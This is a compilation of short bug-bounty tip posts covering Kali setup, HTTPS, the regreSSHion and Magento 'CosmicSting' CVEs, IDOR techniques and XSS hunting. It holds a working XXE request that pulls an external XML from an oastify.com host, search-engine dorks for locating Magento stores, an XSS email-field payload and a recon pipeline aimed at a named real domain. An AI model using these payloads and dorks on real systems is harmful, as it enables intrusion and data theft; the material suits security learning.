Bug bounty Tips

😎Your kali linux suck👇 Yes, your kali linux sucks as you guys don't have a updated one, or installed as bootable which will be slow or in 16gb usb it takes 3hrs to load. if yes then check out my video on 📹 Install kali linux in three steps. 1️⃣ Download @vmware workstation player 2️⃣ Download @kalilinux pre-build virtual machines 3️⃣ Open vmware and add the configuration file. Type the 👇 Default Username : KALI Default Password : KALI . . 🎉 You’re all set to explore the powerful tools and features of Kali Linux!👉 Save this post for later and share it with your friends. 💬 Got questions? Drop them in the comments! 🔗 Check out the link in our bio for a telegram channel. #kali #bugbounty #learnings #hack #hacks #hacking #hackingtools #vmware #linux #cybersecurity #cyber #cyberpunk #kalilinux #linux #tools #ai https://www.instagram.com/reel/C88ygelS-TF/?igsh=MTc4MmM1YmI2Ng==

🔍List of GitHub Dorks for bug bounties. 📋Finding target Files, Languages, API Keys, Tokens, Usernames, Passwords, Information using Dates, Extension 📓 🔖#infosec #cybersecurity #hacking #pentesting #security

🔐 Tip of the Day: How HTTPS Works! 🌐🔍 Ever wondered how your data stays safe while browsing the web? Dive into the world of HTTPS and discover the magic behind secure communication. 🔒✨ 1️⃣ Server Certificate Check: Ensuring the server is who it claims to be. 2️⃣ Key Exchange: Establishing a secure connection with encryption keys. 3️⃣ Encrypted Tunnel: Safeguarding your data as it travels between client and server. Stay informed, stay secure! 💻🔐 👉 Follow us for more cybersecurity tips and tricks! 🌐 Visit us at www.cipherops.xyz 📲 @cipherops.tech Credit : @bytebytego https://www.instagram.com/p/C86mxZNyqq8/?igsh=MTc4MmM1YmI2Ng==

Check out this guy's

🖼️ RegreSSHion — OpenSSH Unauthenticated RCE The Qualys Threat Research Unit has discovered a Remote Unauthenticated Code Execution vulnerability in OpenSSH’s server (sshd) in glibc-based Linux systems. CVE assigned to this vulnerability is CVE-2024-6387. The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems. 🔗 Research: https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server 🔗 PoC: https://github.com/7etsuo/cve-2024-6387-poc #openssh #glibc #rce #cve

🔥Magento XXE CVE-2024-34102: A newly discovered vulnerability dubbed “CosmicSting” jeopardizes millions of online stores built on Adobe Commerce and Magento platforms. ⚠️CosmicSting enables attackers to gain unauthorized access to sensitive files, including those containing passwords. When combined with a recent Linux bug (CVE-2024-2961), the vulnerability can be escalated to remote code execution. 📣Dorks: Hunter: http://product.name="Adobe Magento" FOFA: app="Adobe-Magento" SHODAN: http.html:"magento-template" ▶️Video POC: https://youtu.be/rDs_Qj7K31M 🔴POC: https://github.com/th3gokul/CVE-2024-34102 ⛔️Payload:

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2 Content-Type: application/json Content-Length: 192 {"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData": {"data":"http://*.oastify.com/xxe.xml","dataIsURL":true,"options":12345678}}}}}}

⚠️Tool Made By: D. Sanjai Kumar & Gokul V

⚡️Burp Suite for Pentester ℹ️This cheat sheet is built for Bug Bounty Hunters and penetration testers to help them hunt the vulnerabilities. It is designed such that beginners can understand the fundamentals and professionals can brush up their skills with the advanced options. 🔹 Web Scanner & Crawler 🔹Fuzzing with Intruder (Part3) 🔹Fuzzing with Intruder (Part2) 🔹Fuzzing with Intruder (Part1) 🔹XSS Validator 🔹Configuring Proxy 🔹Burp Collaborator 🔹HackBar 🔹Burp Sequencer 🔹Turbo Intruder 🔹Engagement Tools 🔹Payload Processing Rule (Part2) 🔹Payload Processing Rule (Part1) 🔹Beginners Guide to Burpsuite Payloads (Part2) 🔹Beginners Guide to Burpsuite Payloads (Part1) 🔹Encoder & Decoder Tutorial 🔹Active Scan++ 🔹Software Vulnerability Scanner 🔹Burp’s Project Management 🔹Repeater 🔗Link: https://github.com/Ignitetechnologies/BurpSuite-For-Pentester 🔖#infosec #cybersecurity #hacking #pentesting #security

Guys happy to anounce that i want working on an automated recon to XSS tool to day i completed and was able to successfully execute it. so i request you guys to check and lets me know you thoughts and please do share the tool and support me and also happy for more contribution on the tool. https://github.com/Adwaithsheety/Auto_xss

Advanced IDORs - 9 Techniques by Intigriti: 1. Exploiting Basic IDORs How to: Modify a predictable numeric ID in the request URL or parameters. Example: GET /user/email?userId=1002 (change userId to another value). 2. Exploiting IDORs via Parameter Pollution How to: Inject multiple instances of the same parameter in the request. Example: POST /update_profile with user_id=1234&user_id=5678. 3. Exploiting IDORs via JSON Globbing How to: Manipulate JSON fields with arrays, booleans, wildcards, or large integers. Example: { "user_id": ["1234", "5678"] } or { "user_id": "*" }. 4. Exploiting Method-Based IDORs How to: Change the HTTP method to bypass access controls. Example: Change GET /user/data to POST /user/data. 5. Exploiting Content-Type-Based IDORs How to: Alter the Content-Type header to manipulate request processing. Example: Use Content-Type: application/json instead of Content-Type: text/plain. 6. Exploiting IDORs via Deprecated API Versions How to: Use older API versions that may lack updated security checks. Example: Access /v1/user/data instead of /v2/user/data. 7. Exploiting IDORs in APIs that Use Static Keywords How to: Replace keywords like current or me with numerical user IDs. Example: Change /user/profile/current to /user/profile/1002. 8. Exploiting IDORs that Require Unpredictable IDs How to: Find references to UUIDs or hashes in other parts of the application. Example: Extract UUID from profile URLs like /profile/123e4567-e89b-12d3-a456-426614174000. 9. Exploiting Second-Order IDOR Vulnerabilities How to: Manipulate stored IDs used in subsequent processes. Example: Submit a form that stores your ID, then trigger an export process that retrieves data using that stored ID. ---------------------------------------------------------- I've never seen real-world examples for some of them, but they are definitely worth the try. #pentesting #appsec #bugbounty #cybersecurity Here's the full scoop: https://buff.ly/3zfhhzL

Find xss with this automation of the following work : 1. subfinder -d indeed.com -o indeed.txt //Find Subdomains 2. httpx -l subdomains.txt -o httpx.txt // Live Subdomains 3. echo "indeed.com" | gau --threads 5 >> Enpoints.txt // Find Endpoints 4. cat httpx.txt | katana -jc >> Enpoints.txt // Find More Endpoints 5. cat Enpoints.txt | uro >> Endpoints_F.txt // Remove Duplicates 6. cat Endpoints_F.txt | gf xss >> XSS.txt // Filter Endpoints for XSS 7. cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt // Find reflected Parameters 8. dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt // Find XSS Script : https://github.com/dirtycoder0124/xss

🙏 please give reaction or feedback on this

Tips 🌿🌻🍂 whenever you saw any email input field! 70% bug hunters don't try XSS there as compared to name field. always try this in email input field! "<img/src/onerror=alert(0)"@xss.com This don't work every time but give it a try found 2 XSS today using this! Tips 🌿🌻🍂 👆

IDOR TIPS~ Always try to find hidden parameters for this endpoints using Arjun, Parameth, etc. Endpoints:- /settings/profile /user/profile /user/settings /account/settings /username /profile And any similar endpoints. #bugbounty #BugBountyTip #CyberSecurity #hackers #infosec